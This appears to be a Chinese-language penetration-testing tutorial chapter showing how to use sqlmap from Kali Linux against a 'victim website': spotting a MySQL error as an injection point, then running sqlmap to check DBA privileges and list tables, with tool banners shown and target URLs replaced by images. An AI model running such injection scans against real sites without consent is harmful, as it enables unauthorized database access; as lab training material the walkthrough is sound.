SQLMAP之漏洞服务器
准备工具
1、kali 系统IP 10.10.10.131
2、受害网站![[置顶] kali攻防第14章 SQLMAP之漏洞服务器](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9nby9hSFIwY0RvdkwybHRaeTVpYkc5bkxtTnpaRzR1Ym1WMEx6SXdNVFV4TWpJNU1UUXhPVFF3TVRBM1AzZGhkR1Z5YldGeWF5OHlMM1JsZUhRdllVaFNNR05FYjNaTU1rcHpZakpqZFZrelRtdGlhVFYxV2xoUmRpOW1iMjUwTHpWaE5rdzFUREpVTDJadmJuUnphWHBsTHpRd01DOW1hV3hzTDBrd1NrSlJhMFpEVFVFOVBTOWthWE56YjJ4MlpTODNNQzluY21GMmFYUjVMME5sYm5SbGNnPT0%3D.jpg?w=700&webp=1 "[置顶] kali攻防第14章 SQLMAP之漏洞服务器")
3、使用工具sqlmap
步骤:
1、登录受害网站
网址设置为![[置顶] kali攻防第14章 SQLMAP之漏洞服务器](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9nby9hSFIwY0RvdkwybHRaeTVpYkc5bkxtTnpaRzR1Ym1WMEx6SXdNVFV4TWpJNU1UUXlNVE0xTnpFelAzZGhkR1Z5YldGeWF5OHlMM1JsZUhRdllVaFNNR05FYjNaTU1rcHpZakpqZFZrelRtdGlhVFYxV2xoUmRpOW1iMjUwTHpWaE5rdzFUREpVTDJadmJuUnphWHBsTHpRd01DOW1hV3hzTDBrd1NrSlJhMFpEVFVFOVBTOWthWE56YjJ4MlpTODNNQzluY21GMmFYUjVMME5sYm5SbGNnPT0%3D.jpg?w=700&webp=1 "[置顶] kali攻防第14章 SQLMAP之漏洞服务器")
出现Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in E:\WWW\techdetail.php on line 8 (这里就是mysql数据库,找到sql注入点)
2、使用sqlmap工具模块进行扫描
root@kali:~# sqlmap -u ![[置顶] kali攻防第14章 SQLMAP之漏洞服务器](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9nby9hSFIwY0RvdkwybHRaeTVpYkc5bkxtTnpaRzR1Ym1WMEx6SXdNVFV4TWpJNU1UUXlNVFV4TVRnM1AzZGhkR1Z5YldGeWF5OHlMM1JsZUhRdllVaFNNR05FYjNaTU1rcHpZakpqZFZrelRtdGlhVFYxV2xoUmRpOW1iMjUwTHpWaE5rdzFUREpVTDJadmJuUnphWHBsTHpRd01DOW1hV3hzTDBrd1NrSlJhMFpEVFVFOVBTOWthWE56YjJ4MlpTODNNQzluY21GMmFYUjVMME5sYm5SbGNnPT0%3D.jpg?w=700&webp=1 "[置顶] kali攻防第14章 SQLMAP之漏洞服务器")
--dbms "mysql"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151130}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
3、判断是否为数据库管理员用户
root@kali:~# sqlmap -u --dbms "mysql" --is-dba
![[置顶] kali攻防第14章 SQLMAP之漏洞服务器](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9nby9hSFIwY0RvdkwybHRaeTVpYkc5bkxtTnpaRzR1Ym1WMEx6SXdNVFV4TWpJNU1UUXlNakkxTURBMlAzZGhkR1Z5YldGeWF5OHlMM1JsZUhRdllVaFNNR05FYjNaTU1rcHpZakpqZFZrelRtdGlhVFYxV2xoUmRpOW1iMjUwTHpWaE5rdzFUREpVTDJadmJuUnphWHBsTHpRd01DOW1hV3hzTDBrd1NrSlJhMFpEVFVFOVBTOWthWE56YjJ4MlpTODNNQzluY21GMmFYUjVMME5sYm5SbGNnPT0%3D.jpg?w=700&webp=1 "[置顶] kali攻防第14章 SQLMAP之漏洞服务器")
4、使用 --table参数查看
root@kali:~# sqlmap -u --table
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20151130}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
![[置顶] kali攻防第14章 SQLMAP之漏洞服务器](https://image.shishitao.com:8440/aHR0cHM6Ly93d3cuaXRkYWFuLmNvbS9nby9hSFIwY0RvdkwybHRaeTVpYkc5bkxtTnpaRzR1Ym1WMEx6SXdNVFV4TWpJNU1UUXlNalUwTXpRM1AzZGhkR1Z5YldGeWF5OHlMM1JsZUhRdllVaFNNR05FYjNaTU1rcHpZakpqZFZrelRtdGlhVFYxV2xoUmRpOW1iMjUwTHpWaE5rdzFUREpVTDJadmJuUnphWHBsTHpRd01DOW1hV3hzTDBrd1NrSlJhMFpEVFVFOVBTOWthWE56YjJ4MlpTODNNQzluY21GMmFYUjVMME5sYm5SbGNnPT0%3D.jpg?w=700&webp=1 "[置顶] kali攻防第14章 SQLMAP之漏洞服务器")